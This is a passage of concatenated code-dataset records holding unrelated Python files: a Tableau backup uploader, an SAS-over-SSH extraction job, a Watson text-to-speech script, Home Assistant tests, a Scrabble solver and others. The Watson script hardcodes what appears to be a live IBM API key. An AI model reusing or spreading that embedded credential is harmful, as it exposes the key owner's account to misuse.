json_data['site']\n\tSERVER = json_data['server']\n\tBACKUP_ROOT = json_data['backup_directory']\n\tBUCKET_NAME = json_data['bucket_name']\n\n\t#Log to backup root\n\tlogging.basicConfig(filename=BACKUP_ROOT + '/' +'backup.log',level=logging.INFO)\n\tlogging.info(\"Starting at: \" + str(datetime.datetime.today()))\n\n\t#Create Backup Directory\n\tbackup_date = datetime.datetime.today().strftime('%Y-%m-%d')\n\tbackup_directory = BACKUP_ROOT + \"/\" + backup_date\n\n\ttry:\n\t os.makedirs(backup_directory)\n\texcept OSError as e:\n\t pass\n\n\t#Set up auth and server object\n\ttableau_auth = TSC.TableauAuth(USERNAME, PASSWORD, site_id=SITE)\n\tserver = TSC.Server(SERVER, use_server_version=True)\n\n\t#Get Projects\n\n\tserver.auth.sign_in(tableau_auth)\n\n\tfor project in TSC.Pager(server.projects):\n\t\tprojects[project.id] = project\n\t\tif project.parent_id in project_children:\n\t\t\tproject_children[project.parent_id].append(project.id)\n\t\telse:\n\t\t\tproject_children[project.parent_id] = [project.id]\n\n\t#Start Building\n\t#Root at None\n\tproject_paths[None] = backup_directory\n\tfolder_builder(None)\n\n\tlogging.info('Folder structure built')\n\n\t#Iterate through workbooks\n\tfor workbook in TSC.Pager(server.workbooks):\n\t\t#Get project location\n\t\tlocation = project_paths[workbook.project_id]\n\t\t#Download workbook without Extract to location\n\t\tserver.workbooks.download(workbook.id, filepath=location, no_extract=True)\n\n\tlogging.info('Workbooks downloaded')\n\tserver.auth.sign_out()\n\n\t#Create zipfile\n\tbackup_name = 'tableau-backup-' + backup_date\n\tbackup_zip = BACKUP_ROOT + '/' + backup_name\n\tshutil.make_archive(backup_zip, 'zip', backup_directory)\n\tbackup_name += '.zip'\n\tbackup_zip +='.zip'\n\t#Remove directory\n\ttry:\n\t shutil.rmtree(backup_directory)\n\texcept OSError as e:\n\t logging.error(\"Error: %s - %s.\" % (e.filename, e.strerror))\n\n\t#upload to s3\n\n\ts3 = boto3.resource('s3')\n\tdata = open(backup_zip, 'rb')\n\ts3.Bucket(BUCKET_NAME).put_object(Key=backup_name, Body=data)\n\tlogging.info('Uploaded ' + backup_name + ' to S3 bucket ' + BUCKET_NAME)\n\n\t#Remove ZIP\n\tos.remove(backup_zip)\n\tlogging.info(\"Ended at: \" + str(datetime.datetime.today()))\n\nif __name__ == \"__main__\":\n main()","sub_path":"tableau_backup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544460623","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nimport ARM\nfrom WeaknessAnalysisPanel import WeaknessAnalysisPanel\nfrom Borg import Borg\n\nclass WeaknessAnalysisDialog(wx.Dialog):\n def __init__(self,parent,cvName,envName):\n wx.Dialog.__init__(self,parent,-1,'Weakness analysis for ' + cvName,style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(600,350))\n self.panel = 0\n self.theThreatTargets = []\n self.theVulnerabilityTargets = []\n self.theGoalObstacles = []\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n self.panel = WeaknessAnalysisPanel(self,cvName,envName)\n mainSizer.Add(self.panel,1,wx.EXPAND)\n self.SetSizer(mainSizer)\n wx.EVT_BUTTON(self,armid.WEAKNESSANALYSIS_BUTTONCOMMIT_ID,self.onCommit)\n\n def onCommit(self,evt):\n thrList = self.FindWindowById(armid.WEAKNESSANALYSIS_LISTTHREATS_ID)\n vulList = self.FindWindowById(armid.WEAKNESSANALYSIS_LISTVULNERABILITIES_ID)\n goList = self.FindWindowById(armid.WEAKNESSANALYSIS_LISTGOALOBSTACLE_ID)\n\n thrDict = thrList.dimensions() \n for thrName in thrDict:\n target = thrDict[thrName]\n if target.requirement() != '':\n self.theThreatTargets.append(target) \n vulDict = vulList.dimensions() \n for vulName in vulDict:\n target = vulDict[vulName]\n if target.requirement() != '':\n self.theVulnerabilityTargets.append(target) \n\n self.theGoalObstacles = goList.dimensions()\n self.EndModal(armid.WEAKNESSANALYSIS_BUTTONCOMMIT_ID)\n def targets(self):\n return self.theThreatTargets + self.theVulnerabilityTargets\n\n def goalObstacles(self):\n return self.theGoalObstacles\n","sub_path":"cairis/cairis/WeaknessAnalysisDialog.py","file_name":"WeaknessAnalysisDialog.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"613359441","text":"\n\nimport os\nimport sys\nfrom string import Template\nimport paramiko\n\n\nif __name__ == \"__main__\":\n\n segment = sys.argv[2]\n\n\n sas_code = Template(\"\"\"\nlibname cat_lib META LIBRARY=TOYPosProdStoreLevWeekly;\n\nproc sql;\n\n\ncreate table work.A as\nselect \ndma, \noutlet, \nbrand, \nppmonth, \nitemnumber, \nsum(unitssold) as units, \nsum(totalvalue) as dollars\nfrom\ncat_lib.vw_toyml_fact_nc\nwhere\nsegment1=1185089780\ngroup by \ndma, outlet, brand, ppmonth, itemnumber;\n\ncreate table work.B as\nselect ppmonth, monthyear from cat_lib.vw_toyml_ppmonth_lu;\n\ncreate table work.C as\nselect itemnumber, item_desc from cat_lib.vw_toyml_item_lu;\n\ncreate table work.D as\nselect outlet, outlet_name from cat_lib.vw_toyml_outlet_lu;\n\ncreate table work.E as\nselect brand, brand_name from cat_lib.vw_toyml_brand_lu;\n\nquit;\n\nproc export data=WORK.A dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.csv'\nreplace;\nrun;\n\nproc export data=WORK.B dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.months.csv'\nreplace;\nrun;\n\nproc export data=WORK.C dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.items.csv'\nreplace;\nrun;\n\nproc export data=WORK.D dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.outlets.csv'\nreplace;\nrun;\n\nproc export data=WORK.E dbms=csv\noutfile='/sasfiles/aa/analytics_platform/beats/toys_ppi_$SEGMENT.brands.csv'\nreplace;\nrun;\n\n \"\"\").substitute(\n SEGMENT=segment\n )\n\n # paths for sas files\n local_sas_file = '/root/airflow/jobs/tmp/toys_price_permission_'+str(segment)+'.sas'\n remote_sas_file = '/sasfiles/aa/analytics_platform/beats/toys_price_permission_'+str(segment)+'.sas'\n\n # write code to disk\n with open(local_sas_file, 'w') as f:\n f.write(sas_code)\n\n # start SSH client\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(os.environ['SAS_HOST'], 22, username=os.environ['SAS_USERNAME'], password=os.environ['SAS_PASSWORD'])\n\n # copy sas code to server\n sftp = ssh.open_sftp()\n sftp.put(local_sas_file, remote_sas_file)\n\n # run sas code\n sas_exec_command = '$GRID_EXEC -gridsubmitpgm '+remote_sas_file+' -METAUSER ' + os.environ['SAS_USERNAME'] + ' -METAPASS ' + os.environ['SAS_METAPASS'] + ' -GRIDWAIT'\n stdin, stdout, stderr = ssh.exec_command(sas_exec_command)\n exit_status = stdout.channel.recv_exit_status()\n\n # delete remote file\n ssh.exec_command('rm ' + remote_sas_file)\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.months.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.months.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.items.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.items.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.outlets.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.outlets.csv'\n )\n\n # copy back to local\n sftp.get(\n '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.brands.csv',\n '/root/airflow/jobs/tmp/toys_ppi_'+str(segment)+'.brands.csv'\n )\n\n # delete remote file\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.brands.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.items.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.months.csv')\n ssh.exec_command('rm ' + '/sasfiles/aa/analytics_platform/beats/toys_ppi_'+str(segment)+'.outlets.csv')\n\n # shut down SSH client\n sftp.close()\n ssh.close()\n\n","sub_path":"airflow/jobs/price_permission/toys/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"545243143","text":"import requests\nimport features.src.support.helpers as helpers\nimport re\nimport os\n\n\nclass ImportBooster(object):\n def importGithubRepo(self, gitRepo):\n\n ###############################################\n # Environment variables\n #\n # Note: Pipelines = https://forge.api.openshift.io/api/services/jenkins/pipelines\n # Tokens are stored in a form of \";(;)\"\n theToken = helpers.get_user_tokens().split(\";\")[0]\n projectName = os.getenv('PROJECT_NAME')\n pipeline = os.getenv('PIPELINE')\n spaceId = helpers.getSpaceID()\n authHeader = 'Bearer {}'.format(theToken)\n\n print('Starting test.....')\n\n ###############################################\n # Import the booster\n headers = {'Accept': 'application/json',\n 'Authorization': authHeader,\n 'X-App': 'osio',\n 'X-Git-Provider': 'GitHub',\n 'Content-Type': 'application/x-www-form-urlencoded'}\n data = {'gitRepository': gitRepo,\n 'projectName': projectName,\n 'pipeline': pipeline,\n 'space': spaceId}\n\n forgeApi = os.getenv(\"FORGE_API\")\n\n print('Making request to import...')\n r = requests.post(\n '{}/api/osio/import'.format(forgeApi),\n headers=headers,\n data=data\n )\n print('request results = {}'.format(r.text))\n\n result = r.text\n if re.search('uuid', result):\n return 'Success'\n else:\n return 'Fail'\n","sub_path":"booster_bdd/features/src/importBooster.py","file_name":"importBooster.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"60375025","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom product.models import Category, Subcategory\n\n\n\ndef index(request):\n array = []\n categories = Category.objects.all()\n for category in categories:\n subcategories = Subcategory.objects.filter(category=category)\n cat = [category, [subcategories]]\n array.append(cat)\n context = {'categories': array}\n return render(request, 'ASA/home.html', context=context)\n\ndef about(request):\n return render(request, 'ASA/about.html')","sub_path":"food_market/ASA/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"171292285","text":"import h5py\r\nimport os\r\nimport numpy as np\r\n\r\nclass HDF5DatasetWriter:\r\n \r\n def __init__(self, dims, outputPath, bufSize=500):\r\n \r\n if os.path.exists(outputPath):\r\n raise ValueError(\"the file before continuing.\", outputPath)\r\n \r\n print(\"[INFO] Writing external_forces({}) in HDF5 format\".format(dims))\r\n print(\"[INFO] Writing computed_displacements({}) in HDF5 format\".format(dims))\r\n\r\n self.db = h5py.File(outputPath, \"w\")\r\n self.data = self.db.create_dataset(\"external_forces\", dims, dtype=\"float\")\r\n self.labels = self.db.create_dataset(\"computed_displacements\", (dims), dtype=\"float\") \r\n \r\n self.bufSize = bufSize\r\n self.buffer = {\"data\": [], \"labels\": []}\r\n self.idx = 0 \r\n \r\n def add(self, rows, labels):\r\n self.buffer[\"data\"].extend(rows)\r\n self.buffer[\"labels\"].extend(labels)\r\n \r\n if len(self.buffer[\"data\"]) >= self.bufSize:\r\n self.flush()\r\n \r\n \r\n def flush(self):\r\n i = self.idx + len(self.buffer[\"data\"])\r\n self.data[self.idx:i] = self.buffer[\"data\"]\r\n self.labels[self.idx:i] = self.buffer[\"labels\"]\r\n self.idx = i\r\n self.buffer = {\"data\": [], \"labels\": []}\r\n \r\n\r\n \r\n def close(self):\r\n \r\n if len(self.buffer[\"data\"]) > 0:\r\n self.flush()\r\n \r\n self.db.close()\r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"utils/io/hdf5datasetwriter.py","file_name":"hdf5datasetwriter.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"59670584","text":"from ibm_watson import TextToSpeechV1\r\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\r\nfrom playsound import playsound\r\n\r\nauthenticator = IAMAuthenticator('ts89j5bMBWLYT6VScb2J7JVLEnsM0Bi5yvo1L3pVKSqv')\r\ntext_to_speech = TextToSpeechV1(\r\n authenticator=authenticator\r\n)\r\n\r\ntext_to_speech.set_service_url('https://api.eu-gb.text-to-speech.watson.cloud.ibm.com/instances/229c9936-726f-4a8e-9f6b-9a5b5cebf9a4')\r\n\r\nwith open('new_file.mp3', 'wb') as audio_file:\r\n audio_file.write(\r\n text_to_speech.synthesize(\r\n 'Hello all how are you hope every one is doing well good morning hemangini maam ',\r\n voice='en-US_AllisonV3Voice',\r\n accept='audio/mp3' \r\n ).get_result().content)\r\n\r\nplaysound('new_file.mp3')\r\n","sub_path":"t-t-s.py","file_name":"t-t-s.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"268264545","text":"class Data:\n\n dayspermonth = [0, 31, 28, 31, 22, 44, 66, 55, 7, 53, 2, 3]\n\n def __int__(self, month, day, year):\n if 0 < month <= 12:\n self.month = month\n else:\n raise (ValueError, \"Invalid value for month: %d\" % month)\n\n if year >= 0:\n self.year = year\n else:\n raise (ValueError, \"Invaild value for year: %d\" % year)\n\n self.day = self.checkDay(day)\n print(\"Date constructor:\", self.display())\n\n def __del__(self):\n print(\"Date object about to be destroyed\", self.display())\n\n def display(self):\n print(\"%d%d%d\" % (self.month, self.day, self.year))\n\n def checkDay(self,testDay):\n if 0 < testDay <= Data.dayspermonth[self.month]:\n return testDay\n elif self.month == 2 and testDay == 29 and \\\n (self.year % 400 == 0 or self.year % 100 != 0 and self.year % 4 == 0):\n return testDay\n else:\n raise (ValueError, \"Invaild day: %d for month: %d\" %\\\n (testDay, self.month))\n\n","sub_path":"chapter 7 python/Definition _of_class_data.py","file_name":"Definition _of_class_data.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"259660856","text":"\"\"\"\nDefines the functions to communicate with Petrolog mqtt Broker\n\"\"\"\n\n__author__ = 'Cesar'\n\n\nimport mosquitto\nfrom deviceCommand_class import deviceCommand\nfrom deviceCommand_class import Commands\nimport config\n\n# Create Mosquitto Client object\nmqttc = mosquitto.Mosquitto(\"mqttPetrologCommands\")\n\n\n# Define event callbacks\ndef on_connect(mosq, obj, rc):\n config.logging.info(\"Connected, rc: \" + str(rc))\n # Subscribe to Command\n mqttc.subscribe('F/#', 0)\n\n\ndef on_message(mosq, obj, msg):\n msgID = msg.topic.split('/')\n new_id = msgID[1]\n for device in Commands:\n if device.d_id == new_id:\n # already in list, look for command response\n if msgID[2] == 'PR':\n device.response = msg.payload\n config.logging.debug(\"Responding Command [{0}] with Response [{1}] \"\n .format(device.commandId, device.response))\n if device.setCommandResponse_via_httpPOST():\n config.logging.debug(\"Success!\")\n else:\n config.logging.debug(\"Fail!\")\n return\n if new_id != '':\n Commands.add(deviceCommand(new_id, '', '', '', False))\n return\n\n\ndef on_publish(mosq, obj, mid):\n config.logging.debug(\"mid: \" + str(mid))\n\n\ndef on_subscribe(mosq, obj, mid, granted_qos):\n config.logging.info(\"Subscribed: \" + str(mid) + \" \" + str(granted_qos))\n\n\ndef on_log(mosq, obj, level, string):\n config.logging.debug(string)\n\n\ndef mqttPetrologDaemon():\n # Assign event callbacks\n mqttc.on_message = on_message\n mqttc.on_connect = on_connect\n mqttc.on_publish = on_publish\n mqttc.on_subscribe = on_subscribe\n\n # Connect\n mqttc.connect('54.85.197.66', 1883)\n\n mqttc.loop_forever()\n","sub_path":"mqttPetrolog.py","file_name":"mqttPetrolog.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"23076336","text":"\nimport tensorflow as tf\n\nmatrix1=tf.constant([[3.,3.]])\nmatrix2 = tf.constant([[2.],[2.]])\nproduct = tf.matmul(matrix1, matrix2)\n\nmnist=tf.keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\nprint(x_train)","sub_path":"Principal_Component_Analysis_(PCA)_with_Python_Examples /test_tensorflow.py","file_name":"test_tensorflow.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446351799","text":"import os\nimport tqdm\nimport pickle\nimport subprocess\n\nimport torch\nimport numpy as np\n\nimport datasets\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Neural Machine Translation with Seq2Seq.')\n parser.add_argument('--gpu', type=str, default='0')\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--train_path', type=str, default='data/iwslt2014/train.de-en.bpe')\n parser.add_argument('--dev_path', type=str, default='data/iwslt2014/dev.de-en.bpe')\n parser.add_argument('--test_path', type=str, default='data/iwslt2014/test.de-en.bpe')\n args = parser.parse_args()\n\n print('Setting CUDA_VISIBLE_DEVICES...')\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n print('Done.')\n\n print('Loading config')\n config = torch.load(os.path.join('experiments/test', 'config.pt'))\n dataset = config['dataset']\n\n print('Loading data...')\n func = getattr(datasets, dataset)\n (source, target), (train_iterator, val_iterator, test_iterator) = func(device, args.batch_size, args.train_path,\n args.dev_path, args.test_path)\n print('Done.')\n\n print('Creating model...')\n model = torch.load('experiments/test/model.pkl')\n model.to(device)\n print('Done.')\n\n target_sos_idx = target.vocab.stoi['']\n output_file = open('experiments/test/predictions', 'wt')\n\n # validation\n model.eval()\n test_loss = 0.\n for i, batch in enumerate(tqdm.tqdm(test_iterator)):\n with torch.no_grad():\n batch_input_seq, batch_input_len = batch.src\n outputs, logits_seq = model(batch_input_seq, output_seq=None, training=False,\n sos_tok=target_sos_idx, max_length=100, device=device)\n\n # convert to tokens\n itos = lambda x: target.vocab.itos[x]\n outputs = np.vectorize(itos)(outputs.T)\n\n # write to file\n for i in outputs:\n output_file.write(' '.join(i) + '\\n')\n output_file.close()\n\n print('Detokenizing...')\n subprocess.run('./detokenizer.sh %s %s 2> /dev/null' % ('./experiments/test/predictions', 'en'), shell=True)\n print('Done.')\n\n print('Calculating BLEU...')\n subprocess.run('cat ./experiments/test/predictions.detok | sacrebleu %s' % './data/iwslt2014/references.de-en.en', shell=True)\n print('Done.')\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"221925386","text":"import math\nimport numpy as np\nfrom ev3sim.simulation.loader import ScriptLoader\n\n\nclass InfraredSensorMixin:\n\n device_type = \"lego-sensor\"\n\n ALL_VALUES = \"AC-ALL\"\n DIRECTION = \"AC\"\n ALL_VALUES_DC = \"DC-ALL\"\n DIRECTION_DC = \"DC\"\n\n mode = ALL_VALUES\n\n # Left to Right, bearing relative to middle.\n SENSOR_BEARINGS = [\n np.pi / 3,\n np.pi / 6,\n 0,\n -np.pi / 6,\n -np.pi / 3,\n ]\n\n SENSOR_BEARING_DROPOFF_MAX = np.pi / 4\n\n MAX_SENSOR_RANGE = 120\n\n MAX_STRENGTH = 9\n\n SUBSENSOR_BIAS_MAGNITUDE = 5\n\n def generateBias(self):\n self.distance_biases = [\n (0.5 - self._interactor.random()) * 2 * self.SUBSENSOR_BIAS_MAGNITUDE\n if ScriptLoader.RANDOMISE_SENSORS\n else 0\n for _ in range(5)\n ]\n self._values = [0 for _ in self.SENSOR_BEARINGS]\n\n def _sensorStrength(self, relativeBearing, distance, sensorIndex):\n perceived_distance = max(distance + self.distance_biases[sensorIndex], 0)\n while relativeBearing > np.pi:\n relativeBearing -= 2 * np.pi\n while relativeBearing < -np.pi:\n relativeBearing += 2 * np.pi\n if perceived_distance > self.MAX_SENSOR_RANGE:\n return 0\n if abs(relativeBearing) > self.SENSOR_BEARING_DROPOFF_MAX:\n return 0\n # At halfway to the sensor, this value is 1/4.\n sq_dist = pow(perceived_distance / self.MAX_SENSOR_RANGE, 2)\n exclude_bearing = (1 - sq_dist) * self.MAX_STRENGTH\n bearing_mult = 1 - abs(relativeBearing) / self.SENSOR_BEARING_DROPOFF_MAX\n return int(math.floor(exclude_bearing * bearing_mult + 0.5))\n\n def _sensorValues(self, relativeBearing, distance):\n return [self._sensorStrength(relativeBearing - b, distance, i) for i, b in enumerate(self.SENSOR_BEARINGS)]\n\n def _predict(self, sensorValues):\n total = sum(sensorValues)\n if total <= 4:\n return 0\n weighted = sum([i * v / total for i, v in enumerate(sensorValues)])\n # weighted is between 0 and len(sensorValues)-1.\n return int(max(min(1 + math.floor(weighted / (len(sensorValues) - 1) * 9), 9), 1))\n\n def _getObjName(self, port):\n return \"sensor\" + port\n\n def applyWrite(self, attribute, value):\n if attribute == \"mode\":\n self.mode = value\n else:\n raise ValueError(f\"Unhandled write! {attribute} {value}\")\n\n def toObject(self):\n data = {\n \"address\": self._interactor.port,\n \"driver_name\": \"ht-nxt-ir-seek-v2\",\n \"mode\": self.mode,\n }\n if self.mode == self.ALL_VALUES:\n for x in range(7):\n data[f\"value{x}\"] = self.value(x)\n elif self.mode == self.DIRECTION:\n data[\"value0\"] = self.value(0)\n elif self.mode == self.ALL_VALUES_DC:\n for x in range(7):\n data[f\"value{x}\"] = 0\n elif self.mode == self.DIRECTION_DC:\n data[\"value0\"] = 0\n else:\n raise ValueError(f\"Unhandled mode {self.mode}\")\n return data\n","sub_path":"ev3sim/devices/infrared/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"112327223","text":"'''\nWhat is the longest word you can build in a game of Scrabble one letter at a time?\nThat is, starting with a valid two-letter word, how long a word can you build\nby playing one letter at a time on either side to form a valid three-letter word,\nthen a valid four-letter word, and so on? (For example, HE could become THE, then THEM,\nthen THEME, then THEMES, for a six-letter result.)\n'''\n\n# First draft\n# Runs with little noticeable delay so no optimizations added\n\nfilename = \"english_dict.txt\"\nlines = open(filename).read().splitlines()\n\n\n# Find longest wordlength to initialize dict\nlongest_wordlength = 0\nfor line in lines:\n if len(line) > longest_wordlength:\n longest_wordlength = len(line)\n\n# Dict with wordlengths as keys\nkeys = [x + 1 for x in range(longest_wordlength)]\nd = dict.fromkeys(keys)\n\n\n# Init and fill dict (set for fast contains check)\nfor key in d.keys():\n d[key] = set()\n\nfor line in lines:\n d[len(line)].add(line)\n\n\n# Check if there is a scrabble path to a minimal (2-length) word from current word\ndef check_word(word):\n path = [word]\n i = 0\n for word_length in range(len(word)-1, 1, -1):\n if path[i][1:] in d[word_length]:\n path.append(path[i][1:])\n elif path[i][:len(path[i])-1] in d[word_length]:\n path.append(path[i][:len(path[i])-1])\n else:\n return False, path\n i+=1\n return True, path\n\n# Returns first, longest, complete scrabble path in our dictionary\ndef check_all_words():\n for word_length in range(28, 1, -1):\n for word in d[word_length]:\n success, path = check_word(word)\n if success:\n return path\n\nprint(check_all_words())\n\n\n","sub_path":"#307-scrabble_problem/scrabble.py","file_name":"scrabble.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"441620129","text":"\"\"\"Test Mikrotik setup process.\"\"\"\nfrom unittest.mock import AsyncMock, Mock, patch\n\nfrom homeassistant.components import mikrotik\nfrom homeassistant.setup import async_setup_component\n\nfrom . import MOCK_DATA\n\nfrom tests.common import MockConfigEntry\n\n\nasync def test_setup_with_no_config(hass):\n \"\"\"Test that we do not discover anything or try to set up a hub.\"\"\"\n assert await async_setup_component(hass, mikrotik.DOMAIN, {}) is True\n assert mikrotik.DOMAIN not in hass.data\n\n\nasync def test_successful_config_entry(hass):\n \"\"\"Test config entry successful setup.\"\"\"\n entry = MockConfigEntry(\n domain=mikrotik.DOMAIN,\n data=MOCK_DATA,\n )\n entry.add_to_hass(hass)\n mock_registry = Mock()\n\n with patch.object(mikrotik, \"MikrotikHub\") as mock_hub, patch(\n \"homeassistant.helpers.device_registry.async_get_registry\",\n return_value=mock_registry,\n ):\n mock_hub.return_value.async_setup = AsyncMock(return_value=True)\n mock_hub.return_value.serial_num = \"12345678\"\n mock_hub.return_value.model = \"RB750\"\n mock_hub.return_value.hostname = \"mikrotik\"\n mock_hub.return_value.firmware = \"3.65\"\n assert await mikrotik.async_setup_entry(hass, entry) is True\n\n assert len(mock_hub.mock_calls) == 2\n p_hass, p_entry = mock_hub.mock_calls[0][1]\n\n assert p_hass is hass\n assert p_entry is entry\n\n assert len(mock_registry.mock_calls) == 1\n assert mock_registry.mock_calls[0][2] == {\n \"config_entry_id\": entry.entry_id,\n \"connections\": {(\"mikrotik\", \"12345678\")},\n \"manufacturer\": mikrotik.ATTR_MANUFACTURER,\n \"model\": \"RB750\",\n \"name\": \"mikrotik\",\n \"sw_version\": \"3.65\",\n }\n\n\nasync def test_hub_fail_setup(hass):\n \"\"\"Test that a failed setup will not store the hub.\"\"\"\n entry = MockConfigEntry(\n domain=mikrotik.DOMAIN,\n data=MOCK_DATA,\n )\n entry.add_to_hass(hass)\n\n with patch.object(mikrotik, \"MikrotikHub\") as mock_hub:\n mock_hub.return_value.async_setup = AsyncMock(return_value=False)\n assert await mikrotik.async_setup_entry(hass, entry) is False\n\n assert mikrotik.DOMAIN not in hass.data\n\n\nasync def test_unload_entry(hass):\n \"\"\"Test being able to unload an entry.\"\"\"\n entry = MockConfigEntry(\n domain=mikrotik.DOMAIN,\n data=MOCK_DATA,\n )\n entry.add_to_hass(hass)\n\n with patch.object(mikrotik, \"MikrotikHub\") as mock_hub, patch(\n \"homeassistant.helpers.device_registry.async_get_registry\",\n return_value=Mock(),\n ):\n mock_hub.return_value.async_setup = AsyncMock(return_value=True)\n mock_hub.return_value.serial_num = \"12345678\"\n mock_hub.return_value.model = \"RB750\"\n mock_hub.return_value.hostname = \"mikrotik\"\n mock_hub.return_value.firmware = \"3.65\"\n assert await mikrotik.async_setup_entry(hass, entry) is True\n\n assert len(mock_hub.return_value.mock_calls) == 1\n\n assert await mikrotik.async_unload_entry(hass, entry)\n assert entry.entry_id not in hass.data[mikrotik.DOMAIN]\n","sub_path":"tests/components/mikrotik/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"517838550","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, datetime, sys, md5\nimport sqlalchemy as sqAl\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker as sqAl_sessionmaker, composite as sqAl_composite\nimport ConfigParser\nfrom composite_col import CompositeCol\nfrom settings import *\nfrom structure import structure as STRUCTURE \n\ndef generate_class(name): # Don't know if we really need name\n\n Base = declarative_base(sqAl.MetaData())\n\n mf_specs = { # specifics of the multi-column fields \n 'multi_bool': {\n 'format': DB_FMT_MB,\n 'db_col_type': sqAl.Boolean,\n },\n 'multi_int': {\n 'format': DB_FMT_MI,\n 'db_col_type': sqAl.Integer,\n },\n 'multi_select': {\n 'format': DB_FMT_MS,\n 'db_col_type': sqAl.Integer,\n },\n 'multi_numeric': {\n 'format': DB_FMT_MN,\n 'db_col_type': sqAl.Integer,\n }\n }\n\n dynclass_dict = {\n 'id': sqAl.Column(sqAl.Integer, primary_key=True),\n '__tablename__': 'participants'\n }\n for field in STRUCTURE.cap_items:\n if field['typ'] in ('str','enum'):\n dynclass_dict[field['fieldname']] = sqAl.Column(field['fieldname'], sqAl.String)\n elif field['typ'] in ('multi_bool', 'multi_int'):\n specs = mf_specs[field['typ']]\n sub_fields = []\n for i, item in enumerate(field['allowance']):\n fn = specs['format'] % (field['fieldname'], i)\n cf = sqAl.Column(fn, specs['db_col_type'], default=field['default'])\n dynclass_dict[fn] = cf\n sub_fields.append(cf)\n dynclass_dict[field['fieldname']] = 